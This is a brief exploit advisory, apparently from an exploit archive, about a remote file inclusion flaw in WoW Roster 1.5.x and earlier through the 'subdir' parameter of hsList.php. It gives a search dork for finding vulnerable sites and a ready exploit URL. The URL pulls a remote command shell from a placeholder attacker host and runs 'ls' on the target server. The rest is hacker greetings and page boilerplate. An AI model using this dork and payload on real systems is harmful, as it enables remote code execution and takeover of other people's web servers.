WoW Roster versions 1.5.x and below suffer from a remote file inclusion vulnerability.
3b0c26cc50b91afc5e251dedcdb37de37abfc8604b249ae597ead330b0892b79Title : WoW Roster <= 1.5.x Remote File Include (hsList.php)
###############################################################################
Discovered By :::: AG-Spider
-----------------------------------------------------------------------------
Class : Remote file include
Rish : Danger
-----------------------------------------------------------------------------
dork : "wow roster version 1.5"
Exploit :
https://www.site.com/[wow_roster_path]/hsList.php?subdir=https://[Shellc0de]]/cmd.txt?&cmd=ls
----------------------------------------------------------------------------
greetz4: [ Black-Code - KILLERxXx - KaBaRa.HaCk .eGy]
c0natct us : AG-Spider [ at ] HoTMail.CoM
thx 2 :::::: Lezr.com & 3asfh.net
_________________________________________________________________
The new MSN Search Toolbar now includes Desktop search!
https://join.msn.com/toolbar/overview
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed